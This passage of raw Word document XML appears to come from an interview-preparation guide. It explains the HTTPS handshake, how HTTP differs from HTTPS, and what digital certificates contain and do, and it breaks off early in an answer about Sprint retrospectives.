      </w:r>
    </w:p>
    <w:p w14:paraId="068BE0E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Session Key</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The symmetric encryption key generated during the handshake that is used to encrypt and decrypt the data between the client and server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3F073B"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FE85B">
          <v:rect id="_x0000_i3849" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7005470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of HTTPS Workflow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1584087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Hello</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Client requests a secure connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05461E3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Hello</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Server responds with certificate and encryption parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E02F5E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Validation</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Client validates the server’s certificate to ensure trustworthiness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A0A6C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ey Exchange</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Client and server exchange encryption keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682A6C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ssion Key Creation</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Both generate the same session key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9D6FE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Encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: All data exchanged is encrypted using the session key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DC04C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Both client and server ensure that the data is not altered during transmission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB0482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nection Close</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The session is terminated securely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CC84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3850" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9AF551" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00CE4B95" w:rsidRDefault="002A50E3" w:rsidP="002A50E3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="949" w:name="_Toc197868163"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between http and https?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="949"/>
    </w:p>
    <w:p w14:paraId="5DE18B0E" w14:textId="73B4A8A4"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0A08C6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ecurity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A36151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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D4FC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 secure</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Data transmitted via HTTP is sent in plain text, which means it can be intercepted or tampered with by third parties (e.g., hackers, ISPs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E234C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7110A57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 HTTPS uses SSL/TLS encryption to secure data transfer. It encrypts the data between the client (browser) and server, preventing eavesdropping and tampering by third parties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A7BB6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ion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCCAE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661FA93"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not encrypted, so anyone with access to the communication channel (e.g., a hacker on the same Wi-Fi network) can read the transmitted data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D6AB0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16AF16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s </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SSL/TLS encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It encrypts the data, ensuring that even if intercepted, the data cannot be easily read or tampered with.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBC8E9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ort:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B6B58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165E0B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y default, HTTP uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>port 80</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F4ADB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5B8585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port 443</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C20B5F2"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Certificate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF110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418CD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No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 required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76994A7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71CA6E4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quires an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Certificate Authority (CA) to verify the identity of the server and establish the encrypted connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF66D4A"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RL Prefix:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CBB0A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2E460CB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URL starts with http://.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50623B3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6386A76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URL starts with https://. The "s" stands for </w:t>
      </w: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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD15F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Trust:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5160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2E435E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provide any mechanism for validating the authenticity of the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F4D3A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668ADD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vides a way to verify the server’s identity using the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authority, helping users know they are connecting to the legitimate server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E315A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Performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC3B3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0DBD8F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Generally faster than HTTPS since there’s no overhead for encryption and decryption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1EFAC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886B0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the encryption and decryption processes, but this difference is usually negligible for most modern systems and networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222C330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SEO Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AE41B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C1B45A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 may be marked as “Not Secure” in modern browsers, potentially affecting user trust and SEO ranking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4CA29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00548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preference to HTTPS websites in search rankings. It is also marked as “Secure” in the browser, building trust with users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B9515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Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5171A60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0FFC5D2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itable for public, informational websites where security is not critical (though even these are being migrated to HTTPS for better trust and SEO).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8F450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165770B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ssential for websites that involve sensitive data like </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>e-commerc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online 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login pages</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and any site that requires user authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338CC4AC"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A61D54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is used for non-sensitive data and does not provide encryption, while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s the secure version of HTTP, using SSL/TLS to encrypt data, protect user privacy, and ensure the authenticity of the website. With the growing emphasis on security,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has become the standard for most modern websites, particularly those handling user data or financial transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F42DFBC" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00CE4B95"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3851" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="091DDD4D" w14:textId="2C4129A1" w:rsidR="004B26C3" w:rsidRPr="00CE4B95" w:rsidRDefault="002B5B56">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="950" w:name="_Toc197868164"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a certificate</w:t>
      </w:r>
      <w:r w:rsidR="004B26C3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="950"/>
    </w:p>
    <w:p w14:paraId="0D700679" w14:textId="687C5156" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E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specifically in the context of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digital certificate</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that serves to authenticate the identity of a server (or client) and facilitate encrypted communication over a network. It is issued by a trusted third party called a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 Certificates play a crucial role in establishing trust and ensuring the security of online transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB51A37"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a Digital Certificate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BB63A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEBF0C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Holder’s Identity</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DD857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ncludes information about the entity to whom it is issued, such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A571A53"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Name (CN)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The domain name (e.g., </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="00617E2C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            <w:color w:val="auto"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>www.example.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A99BD0B"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ganization (O)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The company or entity name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F60F22"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ocation Information</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Details like city, country, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AF77C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Authority (CA) Information</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E92BA6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details about the Certificate Authority (CA) that issued the certificate and the CA's signature that validates the authenticity of the certificate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E05C23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piration Date</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF92FD8"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gital certificates have a validity period. After the expiration date, the certificate is no longer valid, and a new one must be issued.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAD463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ial Number</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716B702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unique identifier for the certificate, used to distinguish it from others issued by the same CA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BAE07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gnature of the CA</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3942DE2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A’s digital signature is used to validate the certificate. The CA signs the certificate to confirm that it is trustworthy and authentic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555211C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487FF5C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ertificate is part of a broader </w:t>
      </w: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 xml:space="preserve"> system, which ensures that the encryption keys used for communication are legitimate and trustworthy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7005876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s of Certificates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F282A4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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EB82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certificates are used to encrypt data during communication between a server and a client, ensuring privacy and security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FECABC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Signing Certificates</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3587693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ign software or code to verify the authenticity and integrity of the software. This helps prevent tampering or malware injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DCD83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Certificates</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015FC9BE"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for client authentication to ensure that only authorized clients can connect to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CB38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ildcard Certificates</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5956403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 multiple subdomains of a domain, for example, *.example.com would secure www.example.com, mail.example.com, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEB52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tended Validation (EV) Certificates</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD8539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Role of a Certificate in HTTPS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2160DA2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you visit a website that uses HTTPS, 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your browser during the SSL/TLS handshake process. The certificate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9EA4A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that the website you are communicating with is legitimate and not an imposter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301F45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ains the public key necessary to initiate encrypted communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC9815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ensure that the data exchanged between your browser and the website is secure and cannot be intercepted or tampered with by third parties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F73B8F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ertificate Chain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758B340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 chain</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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hain ensures that the server’s certificate can be traced back to a trusted CA, verifying its authenticity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEFB9A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Certificates Work in Practice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B108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connects to a server via HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22ABFDA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the browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2F1E0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verifies the authenticity of the certificate by checking if it was issued by a trusted CA, if it is valid, and if the server matches the certificate’s domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199FCB8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browser uses the public key from the certificate to establish an encrypted connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224F8EB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successful verification and encryption setup, data is securely exchanged between the client and server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61232E2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ortance of Certificates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DADFA3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Certificates ensure secure, encrypted communication over the internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3665C3D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Certificates issued by trusted CAs establish confidence that the server you are connecting to is genuine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7917B69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Ensures that the data transmitted between the client and server cannot be tampered with by attackers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC5DA9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3852" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2942A254" w14:textId="40F122BB" w:rsidR="002B5B56" w:rsidRPr="00CE4B95" w:rsidRDefault="007109C5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="951" w:name="_Toc197868165"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a Sprint retrospective</w:t>
      </w:r>
      <w:r w:rsidR="002B5B56" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="951"/>
    </w:p>
    <w:p w14:paraId="31451A78" w14:textId="0276A11A" w:rsidR="00FA5412" w:rsidRPr="00617E2C" w:rsidRDefault="00FA5412"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a Sprint Retrospective:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224B400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rpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE446E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ain goal is to inspect the sprint process and adapt it for better performance in future sprints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F80D725"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discuss what went well, what didn't go well, and how things can be improved moving forward.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCA8E5E"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a safe environment where team members can openly share feedback without fear of blame.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C4838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iming</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF630D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typically happens at the end of a sprint, after the Sprint Review and before the next sprint planning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BCE32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time-boxed to a fixed duration, usually </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1 to 2 hours</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, depending on the sprint length.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16622A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rticipants</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F12BA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members of the Scrum Team, including the </w:t>
      </w:r>
